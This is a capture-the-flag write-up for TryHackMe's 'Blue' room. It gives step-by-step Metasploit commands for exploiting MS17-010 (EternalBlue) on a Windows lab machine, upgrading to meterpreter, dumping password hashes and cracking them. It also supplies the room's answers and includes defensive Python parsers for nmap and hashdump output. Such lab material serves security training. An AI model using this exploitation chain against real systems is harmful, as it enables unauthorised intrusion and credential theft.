TryHackMe : Blue

~ xio
4 min read, Sep 3, 2021


TryHackMe Blue write-up

  • Name: Blue
  • Description: Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
  • Room: tryhackme.com

[Task 1] Recon

Scan the machine

First we need to scan the machine to check for open ports and running services.

sudo nmap -sS -A <machine_ip>

Question: How many ports are open with a port number under 1000?

Answer: 3
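The answer comes straight from the PORT/STATE/SERVICE table that nmap prints. As an added example (not part of the original write-up), here is a small parser that reads that table and counts the open ports below a given number, so the count does not depend on eyeballing the output. The scan output embedded below is constructed for illustration, not captured from the room's machine; the port numbers are chosen to look like a typical Windows host and to give the same count of 3.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of nmap's normal (human-readable) output for one host.
# This is NOT output captured from the TryHackMe machine; the ports are
# illustrative and include one filtered row to show it is not counted as open.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.10
Host is up (0.045s latency).
Not shown: 991 closed ports
PORT      STATE    SERVICE      VERSION
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  open     tcpwrapped
49152/tcp open     msrpc        Microsoft Windows RPC
49153/tcp open     msrpc        Microsoft Windows RPC
49154/tcp filtered msrpc
"""

# A port-table row starts with "<port>/<proto>", then the state, then the service name.
# Header lines ("PORT STATE ...") and summary lines do not start with a digit, so they are skipped.
PORT_ROW = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_ports(nmap_output: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, protocol, state, service) for every port-table row in the output."""
    rows = []
    for line in nmap_output.splitlines():
        match = PORT_ROW.match(line)
        if match:
            rows.append((int(match.group(1)), match.group(2), match.group(3), match.group(4)))
    return rows


def count_open_below(nmap_output: str, limit: int = 1000) -> int:
    """Count ports reported as 'open' whose number is strictly below `limit`."""
    return sum(
        1 for port, _proto, state, _service in parse_ports(nmap_output)
        if state == "open" and port < limit
    )


def open_services(nmap_output: str) -> Dict[int, str]:
    """Map each open port to the service name nmap guessed for it."""
    return {
        port: service for port, _proto, state, service in parse_ports(nmap_output)
        if state == "open"
    }


if __name__ == "__main__":
    print("open ports under 1000:", count_open_below(SAMPLE_NMAP_OUTPUT))
    for port, service in sorted(open_services(SAMPLE_NMAP_OUTPUT).items()):
        print(f"{port:>5}  {service}")
```

The same parser works on any host's normal-format output; for large scans, `-oX` with an XML parser is the more robust choice, but for a single room machine the table rows are enough.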

Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

"We can check the security problems of a device using scripts in Nmap; for example, the vuln script can identify common problems."

nmap <machine_ip> --script vuln

The machine seems to be vulnerable to ms17-010.

Answer: ms17-010

[Task 2] Gain Access

Start Metasploit

We know that the machine has a security problem, and we can use Metasploit to exploit it.

msfconsole

The next step is to find the appropriate exploit for the security problem (ms17-010).

search ms17-010

The exploit we want is the second option

Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Answer: exploit/windows/smb/ms17_010_eternalblue

We have to select the desired exploit and set the required values.

use exploit/windows/smb/ms17_010_eternalblue

and

show options

Set the machine IP:

set RHOSTS <machine_ip>

Question: Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: RHOSTS

Run the exploit

run (or exploit)

You can see now that our exploit was executed and that we got a Windows host shell. In order to continue, we must use the Meterpreter shell to execute commands and upload files.

[Task 3] Escalate

We need to turn the shell into a meterpreter session.

background

and

use post/multi/manage/shell_to_meterpreter

(or simply use shell_to_meterpreter; the full module path is the one below)

Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: post/multi/manage/shell_to_meterpreter

List the sessions and set the session number.

sessions -l

and

set SESSION 1

Question: Select this (use MODULE_PATH). Show options, what option are we required to change?

Answer: SESSION

Now if we list the sessions again, a meterpreter session has been added.

sessions -l

sessions 2

We now have the meterpreter shell, an interactive shell back to the attacker from which we can explore the target machine and execute code.

Use the ps command to list all the processes running on the host system.

ps

[Task 4] Cracking

Use hashdump to dump the user credentials:

hashdump

Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Answer: Jon
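Each hashdump line has the form user:RID:LM-hash:NT-hash:::, and the "non-default" user is the one whose RID is 1000 or higher (built-in accounts such as Administrator and Guest use RIDs below 1000). As an added example (not part of the original write-up), the script below parses that format and runs the checks a defender would apply to a SAM dump: which accounts are non-default, which have the well-known empty NT hash (blank password), and whether any legacy LM hashes are still stored. The dump embedded below is constructed for illustration; Jon's real hash is not shown on this page, so a placeholder hex string stands in for it.

```python
from dataclasses import dataclass
from typing import List

# Well-known constants: the LM and NT hashes of the empty string.
# An LM field equal to EMPTY_LM means LM hashing is disabled for that account (the expected state).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Local accounts with RID >= 1000 are created by an administrator; lower RIDs are built in.
FIRST_USER_RID = 1000

# Constructed sample in hashdump's format. NOT captured from the room's machine;
# the NT hash on the Jon line is a placeholder, not a real hash.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


@dataclass
class SamEntry:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def is_builtin(self) -> bool:
        return self.rid < FIRST_USER_RID

    @property
    def blank_password(self) -> bool:
        return self.nt_hash == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        # A real LM hash present means the password is also stored in the weak legacy format.
        return self.lm_hash != EMPTY_LM


def parse_hashdump(text: str) -> List[SamEntry]:
    """Parse user:RID:LM:NT::: lines; blank lines and '#' comments are ignored."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed hashdump line: {line!r}")
        entries.append(SamEntry(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries


def non_default_users(entries: List[SamEntry]) -> List[str]:
    """Names of accounts that were not created by Windows itself (RID >= 1000)."""
    return [e.user for e in entries if not e.is_builtin]


def audit(entries: List[SamEntry]) -> List[str]:
    """Human-readable findings a defender would review in a SAM dump."""
    findings = []
    for e in entries:
        if not e.is_builtin:
            findings.append(f"{e.user}: non-default account (RID {e.rid})")
        if e.blank_password:
            findings.append(f"{e.user}: empty NT hash (blank password or never set)")
        if e.lm_stored:
            findings.append(f"{e.user}: LM hash stored (legacy weak hash still enabled)")
    return findings


if __name__ == "__main__":
    sam = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default users:", non_default_users(sam))
    for finding in audit(sam):
        print(" -", finding)
```

Reading the RID rather than guessing from the name is what makes this reliable: a renamed built-in Administrator still has RID 500, and a user-created account still starts at 1000.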

https://crackstation.net/

Use the link above to crack the password hash, or crack it locally with hashcat or John the Ripper using rockyou.txt.

Question: Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: alqfna22

[Task 5] Find flags!

Search for the flags using:

search -f flag*.txt

thank you 🌏🔥

